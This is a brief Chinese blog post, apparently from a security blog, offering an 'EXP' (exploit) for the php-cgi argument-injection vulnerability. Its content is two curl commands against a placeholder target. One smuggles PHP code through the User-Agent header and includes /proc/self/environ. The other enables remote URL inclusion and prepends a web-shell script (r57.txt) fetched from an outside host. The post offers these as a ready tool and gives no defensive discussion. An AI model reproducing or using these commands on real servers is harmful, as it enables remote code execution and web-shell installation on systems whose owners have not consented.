您的位置 » 首页 » 实用工具 » php-cgi漏洞利用EXP

php-cgi漏洞利用EXP

发表于5年前 | 作者: seay | 分类: 实用工具 | 孵化于:2012年06月23日 | 文章热度:9,199 次 全屏阅读

显示不全请点击全屏阅读

1、本地包含直接执行代码:

curl -H “USER-AGENT: <?system(‘id’);die();?>” http://target.com/test.php?-dauto_prepend_file%3d/proc/self/environ+-n
 
2、远程包含执行代码:
curl http://target.com/test.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.sh3ll.org/r57.txt
 
如图:

 

Tags:

PHP漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/354/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)